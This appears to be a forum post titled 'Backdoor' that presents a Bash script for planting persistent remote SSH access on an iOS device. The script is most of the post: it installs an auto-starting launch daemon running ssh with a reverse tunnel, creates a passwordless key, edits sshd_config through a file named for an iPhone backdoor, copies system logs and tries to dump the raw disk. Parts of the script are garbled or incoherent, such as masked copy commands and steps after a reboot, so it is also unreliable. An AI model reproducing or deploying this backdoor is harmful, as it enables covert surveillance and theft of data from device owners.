- Check out the git repo for commands: https://github.com/libimobiledevice/libimobiledevice
Backdoor:
This Bash script sorts out all sorts of stuff for getting SSH on an iOS system, so long as there's a unique identifier sorted beforehand. It starts by setting up some hard-core error handling and loggin' functions. Key tasks include copying the SSH file to a specific spot, setting it to run, and creating a daemon (com.example.ssh.plist) that launches SSH with selected specs (key location, port, port forwarding).
It sorts out SSH key creation if needed, kicks out a config file for SSH that doesn't allow password stuff, fiddles with the sshd_config to include extra config files, and restarts the SSH daemon. On top of all that, it collects system logs into a set location and tries to make a kernel dump if certain things happen, handling things like reboots and other low-level stuff.
Code:
Code: Select all
#!/bin/bash
set -euo pipefail
# Function to log errors
log_error() {
echo "Error: $1" >&2
}
# Placeholder for unique identifier - ensure this is securely determined
unique_identifier="unique-identifier-placeholder"
# Define paths
user_home="/var/mobile/Containers/Data/Application/$unique_identifier"
ssh_binary_path="$user_home/ssh"
launch_daemon_path="/Library/LaunchDaemons/com.example.ssh.plist"
ssh_key_path="$user_home/id_rsa"
ssh_config_dir="/etc/ssh/sshd_config.d"
ssh_config_file="$ssh_config_dir/99-iphone-backdoor.conf"
logs_dir="$user_home/logs"
kernel_dump_file="$user_home/kernel_dump.bin"
# Create a folder in the user's home directory
mkdir -p "$user_home"
# Copy the SSH binary to that folder
if ! ***** /usr/bin/ssh "$ssh_binary_path"; then
log_error "Failed to copy SSH binary to $ssh_binary_path"
exit 1
fi
# Change permissions for the binary
chmod +x "$ssh_binary_path"
# Create a launch daemon to run the binary
cat << EOF > "$launch_daemon_path"
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.example.ssh</string>
<key>ProgramArguments</key>
<array>
<string>$ssh_binary_path</string>
<string>-i</string>
<string>$ssh_key_path</string>
<string>-p</string>
<string>2222</string>
<string>-R</string>
<string>8080:localhost:22</string>
</array>
<key>KeepAlive</key>
<true/>
<key>RunAtLoad</key>
<true/>
<key>UserName</key>
<string>mobile</string>
</dict>
</plist>
EOF
# Load the launch daemon
if ! launchctl load -w "$launch_daemon_path"; then
log_error "Failed to load launch daemon from $launch_daemon_path"
exit 1
fi
# Create the SSH key if it doesn't already exist
if [ ! -f "$ssh_key_path" ]; then
ssh-keygen -t rsa -b 4096 -f "$ssh_key_path" -N "" || {
log_error "SSH key generation failed"
exit 1
}
fi
# Ensure the SSH config directory exists
mkdir -p "$ssh_config_dir"
# Create a new SSH config file
cat << EOF > "$ssh_config_file"
PasswordAuthentication no
EOF
# Ensure the Include directive is present in the sshd_config
if ! grep -qxF 'Include /etc/ssh/sshd_config.d/*.conf' /etc/ssh/sshd_config; then
echo "Include /etc/ssh/sshd_config.d/*.conf" >> /etc/ssh/sshd_config
fi
# Restart the SSH daemon
if launchctl list | grep -q com.openssh.sshd; then
launchctl stop com.openssh.sshd
launchctl start com.openssh.sshd
else
log_error "OpenSSH daemon is not running"
exit 1
fi
# Collect system logs
mkdir -p "$logs_dir"
***** /var/log/* "$logs_dir/" || {
log_error "Failed to copy system logs"
exit 1
}
# Create a kernel dump
if command -v nvram &> /dev/null && nvram auto-boot &> /dev/null; then
nvram auto-boot=false
sync
reboot -d
sleep 60
nvram auto-boot=true
dd if=/dev/rdisk0 of="$kernel_dump_file" bs=4096 || {
log_error "Failed to create kernel dump"
exit 1
}
else
log_error "Kernel dump creation failed: nvram or auto-boot setting not available"
exit 1
fi* Just make sure you've got the right permissions and paths sorted out to allow remote access and system monitoring capabilities.